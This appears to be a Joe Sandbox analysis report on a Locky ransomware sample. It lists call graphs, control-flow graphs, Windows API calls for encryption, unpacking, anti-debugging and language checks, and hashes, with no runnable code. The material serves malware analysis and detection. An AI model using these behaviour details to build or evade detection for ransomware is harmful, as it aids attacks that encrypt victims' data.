30096->30137 30150 402ae1 46 API calls 3 library calls 30097->30150 30099 402b9f 30099->30096 30101 402bad 30102 402bb1 30101->30102 30103 402bb9 GetCommandLineA 30101->30103 30151 4046a1 46 API calls 3 library calls 30102->30151 30138 4063f0 51 API calls 2 library calls 30103->30138 30106 402bc9 30152 406335 75 API calls 3 library calls 30106->30152 30109 402bd3 30110 402bd7 30109->30110 30111 402bdf 30109->30111 30153 4046a1 46 API calls 3 library calls 30110->30153 30139 4060bf 74 API calls 7 library calls 30111->30139 30115 402be4 30116 402bf0 30115->30116 30117 402be8 30115->30117 30140 404480 51 API calls 4 library calls 30116->30140 30154 4046a1 46 API calls 3 library calls 30117->30154 30121 402bf7 30122 402c03 30121->30122 30123 402bfc 30121->30123 30141 406060 74 API calls 2 library calls 30122->30141 30155 4046a1 46 API calls 3 library calls 30123->30155 30127 402c08 30128 402c0e 30127->30128 30142 42b880 30127->30142 30128->30127 30135->30087 30136->30091 30137->30101 30138->30106 30139->30115 30140->30121 30141->30127 30143 42b8a1 GetModuleHandleA 30142->30143 30144 42b884 30143->30144 30145 42b8c1 ExitProcess 30144->30145 30147 42b8e1 GetUserDefaultLangID 30144->30147 30147->30144 30148->30092 30149->30095 30150->30099 30152->30109 30156 41544c 30157 41542c 30156->30157 30158 41553c CryptDestroyKey 30157->30158 30159 415438 CryptImportKey 30157->30159 30158->30159 30162 415416 30159->30162 30161 41547c GetLastError 30164 415441 30161->30164 30162->30161 30163 41541e 30162->30163 30165 401946 __CxxThrowException@8 KiUserExceptionDispatcher 30164->30165 30165->30163

    Control-flow Graph

    APIs
      • Part of subcall function 005C05EF: VirtualAlloc.KERNEL32(00000000), ref: 005C05FC
    • VirtualProtect.KERNEL32(?,?,00000004,?,?), ref: 005C00B3
    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00000004,?,?), ref: 005C00C3
    • VirtualProtect.KERNEL32(?,?,00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004), ref: 005C010C
    • VirtualProtect.KERNEL32(00000004,?,?,?,?,00000000,?,00000000,?,00000002,?,?,?,00000004,?,?), ref: 005C0122
    • VirtualFree.KERNELBASE(?,00004000,00000002,?,?,?,00000004,?,?), ref: 005C0187
    Memory Dump Source
    • Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd
    Similarity
    • API ID: Virtual$Protect$AllocFree
    • String ID:
    • API String ID: 3729553426-0
    • Opcode ID: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
    • Instruction ID: 816ef9707d5f24e1af2ab16de0e8654e56fb932d79ebc73ddabb0488f435f8c9
    • Opcode Fuzzy Hash: fdcacacdc00313ccb8ee3fe0694b325b006cea537a284d02c1b417a35e84ad11
    • Instruction Fuzzy Hash: 58419272600115EFDB10EFA4CC85F6ABBA9FF84724B25551DF80597292C775EC42CBA0

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 86 415410-415411 87 415416-4154a3 86->87 88 4154de-4154e2 86->88 95 4154a5-415547 87->95 96 415476-415477 87->96 90 415460-415463 88->90 91 4154e7-41555e 88->91 93 415574-415576 90->93 94 415468-41556f 90->94 105 41548e-4154f8 call 401946 91->105 97 41548b-41548c 93->97 98 41557b-41557f 93->98 119 4154cf-4154d3 94->119 128 415531-415532 95->128 129 4154fd-4154fe 95->129 101 415584-415585 96->101 102 41547c-415569 GetLastError 96->102 104 4154af-4154b2 97->104 97->105 117 4154a0-4154a1 98->117 118 415542-41554c 98->118 107 415587 101->107 102->91 113 415425-415427 104->113 114 4154b7-4154ba 104->114 105->129 120 415588 107->120 123 4154c7-4154ca 113->123 124 41542c-41553c CryptDestroyKey 113->124 114->107 117->124 132 41554e-415551 118->132 131 415438-415506 119->131 120->120 123->119 133 415430-415433 123->133 124->118 128->102 129->114 141 415553-41555a CryptImportKey 131->141 138 415514-415517 132->138 133->131 137 41551e-415521 133->137 137->98 138->94 142 415528-41552c 141->142 142->87
    APIs
    • GetLastError.KERNEL32 ref: 0041547D
    • __CxxThrowException@8.LIBCMT ref: 004154F8
    • CryptDestroyKey.ADVAPI32 ref: 0041553C
    • CryptImportKey.ADVAPI32(?,?,?,00000000,?), ref: 00415553
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: Crypt$DestroyErrorException@8ImportLastThrow
    • String ID:
    • API String ID: 3526249013-0
    • Opcode ID: f09328df2215586b71cf69b723c466f55bfa3c0ce29ebb0ee16f9de38e4b6e4c
    • Instruction ID: 75a59a1b6f99783ae68cbfa4b89e1ee5fa7e17af1fbeaeef52267452b1ef76cb
    • Opcode Fuzzy Hash: f09328df2215586b71cf69b723c466f55bfa3c0ce29ebb0ee16f9de38e4b6e4c
    • Instruction Fuzzy Hash: 2131137019EA04EFCA24CA409480AF9376FABDB342B713457940F5A11AD37C59C7BA5F

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 144 41544c-41557f 149 4154a0-41553c CryptDestroyKey 144->149 150 415542-41556f CryptImportKey 144->150 149->150 166 415528-41552c 150->166 170 4154a5-415547 166->170 171 415476-415477 166->171 183 415531-415532 170->183 184 4154fd-4154fe 170->184 172 415584-415585 171->172 173 41547c-415569 GetLastError call 401946 171->173 176 415587 172->176 173->184 180 415588 176->180 180->180 183->173 184->176
    APIs
    • GetLastError.KERNEL32 ref: 0041547D
    • __CxxThrowException@8.LIBCMT ref: 004154F8
    • CryptDestroyKey.ADVAPI32 ref: 0041553C
    • CryptImportKey.ADVAPI32(?,?,?,00000000,?), ref: 00415553
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: Crypt$DestroyErrorException@8ImportLastThrow
    • String ID:
    • API String ID: 3526249013-0
    • Opcode ID: 2106f5f472efa31c43e07aa171748dc673d1452ca9903e8a0b0f42dcb77937e3
    • Instruction ID: 83b2779ccbba15b0164695fcff30a536cef25776ce6d9a38a2236a95441dfb84
    • Opcode Fuzzy Hash: 2106f5f472efa31c43e07aa171748dc673d1452ca9903e8a0b0f42dcb77937e3
    • Instruction Fuzzy Hash: 2C31047019EA05EFCA14CA44D480AF9376FABCB342B717417A40F5611AD33C59C7AA5F

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 195 415310-4153ce CryptAcquireContextA 215 4153bf-4153c2 195->215 217 415364-4153d8 GetLastError call 401946 215->217 218 41534f-4153d2 215->218 217->218
    APIs
    • GetLastError.KERNEL32(?,00000000,00000000,?,?), ref: 00415329
    • __CxxThrowException@8.LIBCMT ref: 0041534A
      • Part of subcall function 00401946: KiUserExceptionDispatcher.NTDLL(00000000,m7@,?,csm,?,0040376D,?,0047D0DC,?,E06D7363,1FFFFFFF,19930522), ref: 00401988
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,?,?), ref: 00415377
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: AcquireContextCryptDispatcherErrorExceptionException@8LastThrowUser
    • String ID:
    • API String ID: 809346598-0
    • Opcode ID: 7059ad6988ae182a42066c6519d19a8cd95a1f6f774e0fa497de70c6c3be9217
    • Instruction ID: d44a424a447398ebdc4cad06fd6f66df108f5d79a041d891c50ca013437860c6
    • Opcode Fuzzy Hash: 7059ad6988ae182a42066c6519d19a8cd95a1f6f774e0fa497de70c6c3be9217
    • Instruction Fuzzy Hash: 9621167059E90DEEC6148A5088408F5B36DABCB3C137138179C6FA7201D3E89AC7B66F

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 5c01c0-5c01c4 2 5c0235-5c023a 0->2 3 5c01c7-5c01d3 0->3 4 5c023b-5c023c 2->4 5 5c01d5-5c01dd 3->5 6 5c0216-5c0217 LoadLibraryA 3->6 8 5c023e-5c0240 4->8 9 5c0241-5c0244 4->9 10 5c01df 5->10 11 5c0225-5c0226 5->11 7 5c021a-5c0221 6->7 13 5c0223-5c0224 7->13 8->9 12 5c0245 9->12 15 5c0246-5c0248 10->15 16 5c01e1-5c01e5 10->16 11->13 14 5c0228-5c0234 VirtualProtect 11->14 12->15 13->11 14->2 18 5c024a-5c024f 15->18 19 5c0265-5c0274 VirtualProtect 15->19 16->4 17 5c01e7-5c0201 16->17 24 5c0276-5c0277 17->24 25 5c0203 17->25 21 5c0255-5c0263 GetProcAddress 18->21 22 5c0251 18->22 23 5c0205-5c020a 19->23 21->12 22->21 23->24 26 5c020c-5c0214 23->26 25->23 26->6 26->7
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 005C0217
    • VirtualProtect.KERNEL32(?,?,00000004,?,00000000,?,00000000), ref: 005C0234
    • GetProcAddress.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 005C025F
    • VirtualProtect.KERNEL32 ref: 005C026D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID: +
    • API String ID: 3300690313-2126386893
    • Opcode ID: 042d06ce7d3c35a719b21ac66d89e9520a0058648d5d4c5d68ea65a2ee1c511c
    • Instruction ID: 1ec89ed9505e3b039716eb33b0fbee48f14dc5bdb1791e7ae4bc48dc0a4bccde
    • Opcode Fuzzy Hash: 042d06ce7d3c35a719b21ac66d89e9520a0058648d5d4c5d68ea65a2ee1c511c
    • Instruction Fuzzy Hash: 3721DF7A800210AFEB218EE4CC4DF677FA8FF42720B19555DED55EB181D621ED019791

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 28 40347f-403488 29 40349a-4034a1 28->29 30 40348a-403497 call 4033ed 28->30 32 4034a3-4034a4 29->32 33 4034a6 29->33 30->29 35 4034a9 call 401460 32->35 33->35 37 4034ae-4034e2 call 402e74 call 4030d2 35->37 42 4034e4-4034e6 call 401427 37->42 43 4034eb-4034ec 37->43 42->43
    APIs
    • ___BuildCatchObject.LIBCMT ref: 00403492
      • Part of subcall function 004033ED: ___BuildCatchObjectHelper.LIBCMT ref: 00403423
    • _UnwindNestedFrames.LIBCMT ref: 004034A9
    • ___FrameUnwindToState.LIBCMT ref: 004034B7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
    • String ID: csm$csm
    • API String ID: 2163707966-3733052814
    • Opcode ID: f0a11c02f04ef08c4b7e7f2e79c1bf3885e9fdf9dc8db0eb40d1fdd7ce84d278
    • Instruction ID: 5fc37cf1c4be021de61a4d0c28a1b7bb2591f3fb715b9b6c574538197e9c30bc
    • Opcode Fuzzy Hash: f0a11c02f04ef08c4b7e7f2e79c1bf3885e9fdf9dc8db0eb40d1fdd7ce84d278
    • Instruction Fuzzy Hash: 6F01E831001109BBDF129E51CD45EAB7E6AEF14359F048026BD18251A1D73A9AB1DBA9

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 235 5c01f3-5c0201 236 5c0276-5c0277 235->236 237 5c0203 235->237 238 5c0205-5c020a 237->238 238->236 239 5c020c-5c0214 238->239 241 5c021a-5c0221 239->241 242 5c0216-5c0217 LoadLibraryA 239->242 243 5c0223-5c0226 241->243 242->241 245 5c0228-5c023c VirtualProtect 243->245 248 5c023e-5c0240 245->248 249 5c0241-5c0244 245->249 248->249 250 5c0245-5c0248 249->250 252 5c024a-5c024f 250->252 253 5c0265-5c0274 VirtualProtect 250->253 254 5c0255-5c0263 GetProcAddress 252->254 255 5c0251 252->255 253->238 254->250 255->254
    APIs
    • LoadLibraryA.KERNEL32(?), ref: 005C0217
    • VirtualProtect.KERNEL32(?,?,00000004,?,00000000,?,00000000), ref: 005C0234
    • GetProcAddress.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 005C025F
    • VirtualProtect.KERNEL32 ref: 005C026D
    Memory Dump Source
    • Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd
    Similarity
    • API ID: ProtectVirtual$AddressLibraryLoadProc
    • String ID:
    • API String ID: 3300690313-0
    • Opcode ID: b2eb1b8fa864b43ad686802875ac91e386237f25713a69753ad54731c4631e36
    • Instruction ID: 113155464035838254582bb9ac7342e13bb7715cbaeaf1451200005e23c41ea2
    • Opcode Fuzzy Hash: b2eb1b8fa864b43ad686802875ac91e386237f25713a69753ad54731c4631e36
    • Instruction Fuzzy Hash: 5C014C76500624AFDB314E99CC48F77BAADFF45B20B19561CBC5AE7280D721ED048691

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 256 42b880-42b90d call 473830 GetModuleHandleA 272 42b8e3 256->272 273 42b8e5-42b913 ExitProcess 272->273 274 42b8c8-42b8dc call 428e70 272->274 282 42b8e1 GetUserDefaultLangID 274->282 282->272
    APIs
    • GetModuleHandleA.KERNEL32(00000000,00402C24,00400000,00000000,00000000,0000000A), ref: 0042B8A2
    • ExitProcess.KERNEL32 ref: 0042B8C2
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: ExitHandleModuleProcess
    • String ID:
    • API String ID: 3701513920-0
    • Opcode ID: 4ddf0aaea5bf63d9cc2b16d17124679eb37e058fb133eb14cd2cb6b7844cd9bd
    • Instruction ID: a1f141e45b79c4148c8613c88d2f8cc924be321113b5ed40b3e0555ce0563709
    • Opcode Fuzzy Hash: 4ddf0aaea5bf63d9cc2b16d17124679eb37e058fb133eb14cd2cb6b7844cd9bd
    • Instruction Fuzzy Hash: DE11037129F235DBC614BA10B8041B4736CEB5F3127F27907D54FA3252C7282A4BAACE

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 283 5c0605-5c0617 286 5c05d9 283->286 287 5c0619-5c062f 283->287 288 5c05f5-5c05ff VirtualAlloc 286->288 289 5c0681-5c0683 287->289 290 5c0631-5c063f 287->290 291 5c0601 288->291 290->291 292 5c0641-5c0653 290->292 292->288 295 5c0655-5c0680 292->295 295->289
    APIs
    • VirtualAlloc.KERNEL32(00000000), ref: 005C05FC
    Memory Dump Source
    • Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: e9d80ed9f5a34afd5e9ec27ba938614b3f464397ecac1455d929d020dcfe47f6
    • Instruction ID: 8bed0da9f663b3c12172cd30d5a5c24e58dfef0e5b6dbe521a0a2928e0edb15c
    • Opcode Fuzzy Hash: e9d80ed9f5a34afd5e9ec27ba938614b3f464397ecac1455d929d020dcfe47f6
    • Instruction Fuzzy Hash: 0411E1A6A0D3D18FDB135B788450B88BF30BE83F5430E14C9D8C06B893C351782AC756

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 297 4221db-4221dd 298 422414-42241c DsRoleGetPrimaryDomainInformation 297->298
    APIs
    • DsRoleGetPrimaryDomainInformation.NETAPI32 ref: 004223E1
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: DomainInformationPrimaryRole
    • String ID:
    • API String ID: 2855586375-0
    • Opcode ID: 750127e6ce5fe56f3b8431e99cf1759dea1986f40bbcf984274c7c7a514c641c
    • Instruction ID: c4e3557a329b275ec11c2af1519d607fa45f9a128f6d33727c824bd4795e7878
    • Opcode Fuzzy Hash: 750127e6ce5fe56f3b8431e99cf1759dea1986f40bbcf984274c7c7a514c641c
    • Instruction Fuzzy Hash: 2AB092A464E034A1C2006A222E805FBA01CAB27309AA138AB044A33002497C0086A91E

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 300 419717-41980f SetEntriesInAclA 302 4199c5-4199c7 300->302
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: Entries
    • String ID:
    • API String ID: 3796208217-0
    • Opcode ID: 9a7382421d20b0b878654e8805e2f6d73b414b0d8c3681efe2f14d13f7a122a5
    • Instruction ID: e26bd9fa1095d7f8864f468621c20d3cbf7c1ce4626d098f6b66a9bab9e7ce82
    • Opcode Fuzzy Hash: 9a7382421d20b0b878654e8805e2f6d73b414b0d8c3681efe2f14d13f7a122a5
    • Instruction Fuzzy Hash: FCB0127047C000CAC300AB5484380F8321CB60F302334200EC00F400114B1908CAB51F

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 303 690000-690018 call 6901c0 call 690605 309 69001d-690026 call 690322 303->309 312 690028-69002e 309->312 313 690031-69007d call 6901c0 VirtualAlloc 312->313 314 690030 312->314
    APIs
    • VirtualAlloc.KERNEL32(00000000,00000688,00001000,00000040), ref: 00690065
    Memory Dump Source
    • Source File: 00000000.00000002.2442653732.0000000000690000.00000040.00000020.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_690000_LockyRansom.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 1ac42c9dbe1fbae4a550a043b37b0c5896a51510a9400e2db316b1ef01228121
    • Instruction ID: 1e82db8c2911af7a5cc37037b18bbe7bd918006e6e39bffeab923613ef951a6d
    • Opcode Fuzzy Hash: 1ac42c9dbe1fbae4a550a043b37b0c5896a51510a9400e2db316b1ef01228121
    • Instruction Fuzzy Hash: 8C012675A413056FEF101F70CC04B8F3AAEAFC8720F414828F98AA7681CE7CD8808658

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 320 5c05ef-5c0601 VirtualAlloc
    APIs
    • VirtualAlloc.KERNEL32(00000000), ref: 005C05FC
    Memory Dump Source
    • Source File: 00000000.00000002.2442326137.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005C0000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_5c0000_LockyRansom.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
    • Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
    • Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
    • Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624
    APIs
    • IsDebuggerPresent.KERNEL32 ref: 004068B6
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004068CB
    • UnhandledExceptionFilter.KERNEL32(004792E8), ref: 004068D6
    • GetCurrentProcess.KERNEL32(C0000409), ref: 004068F2
    • TerminateProcess.KERNEL32(00000000), ref: 004068F9
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
    • String ID:
    • API String ID: 2579439406-0
    • Opcode ID: e57c69cd8dfea1af671144ca0df57bf79927f0cc619d4d823731fdda2c415375
    • Instruction ID: b290d19a48650710557560a24cdce15a6a60c0460db7731dd007634dbffc930f
    • Opcode Fuzzy Hash: e57c69cd8dfea1af671144ca0df57bf79927f0cc619d4d823731fdda2c415375
    • Instruction Fuzzy Hash: 1721D4B88002009FD754DF69EE88A483BA4FB48B55F50583EE80997362D7F459858F3D
    APIs
    • __CxxThrowException@8.LIBCMT ref: 0040FC15
      • Part of subcall function 00401946: KiUserExceptionDispatcher.NTDLL(00000000,m7@,?,csm,?,0040376D,?,0047D0DC,?,E06D7363,1FFFFFFF,19930522), ref: 00401988
    • CryptEncrypt.ADVAPI32(?,00000000,?,?,?,?,?), ref: 0040FC9B
    • GetLastError.KERNEL32(?,00000000,?,?,?,?,?), ref: 0040FCDF
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: CryptDispatcherEncryptErrorExceptionException@8LastThrowUser
    • String ID:
    • API String ID: 2264617593-0
    • Opcode ID: 0084bb1cd22e2de217d877fe792ab5710e198f42536f6d863e84f27d3cb13e3f
    • Instruction ID: 86b77c96dd80f2b4247dec5ebed8ed5b11102682704055c09c1c7db4edca1041
    • Opcode Fuzzy Hash: 0084bb1cd22e2de217d877fe792ab5710e198f42536f6d863e84f27d3cb13e3f
    • Instruction Fuzzy Hash: B931E73019E10CEAEA34CA5084468F5336CBB5B301B7174779C0F769D2D3386A5FBA4A
    APIs
    • CryptGenRandom.ADVAPI32(?,?,?), ref: 0040F9A2
    • __CxxThrowException@8.LIBCMT ref: 0040F9F2
      • Part of subcall function 00401946: KiUserExceptionDispatcher.NTDLL(00000000,m7@,?,csm,?,0040376D,?,0047D0DC,?,E06D7363,1FFFFFFF,19930522), ref: 00401988
    • GetLastError.KERNEL32(?,?,?), ref: 0040FA20
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_LockyRansom.jbxd
    Similarity
    • API ID: CryptDispatcherErrorExceptionException@8LastRandomThrowUser
    • String ID:
    • API String ID: 1112074419-0
    • Opcode ID: 7c3562a90b332b41043238a41be523435b79b0f718305afdc1b1974ed58dcfc7
    • Instruction ID: 650e42c9f03ad1bdb63e3f40d1f7d1d8a31d720898254b98d254c0ed2d215352
    • Opcode Fuzzy Hash: 7c3562a90b332b41043238a41be523435b79b0f718305afdc1b1974ed58dcfc7
    • Instruction Fuzzy Hash: 5521F5B029D148FBCA34DA409440AF573ACAB4B301B716537940F76992D33C6A4FAA5F
    APIs
    • GetLocaleInfoA.KERNEL32(?,00000059,?,00000020), ref: 0042E76B
    • GetUserDefaultUILanguage.KERNEL32 ref: 0042E82F
    Memory Dump Source
    • Source File: 00000000.00000002.2441374464.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.2441306674.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441527987.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441608616.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2441680071.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
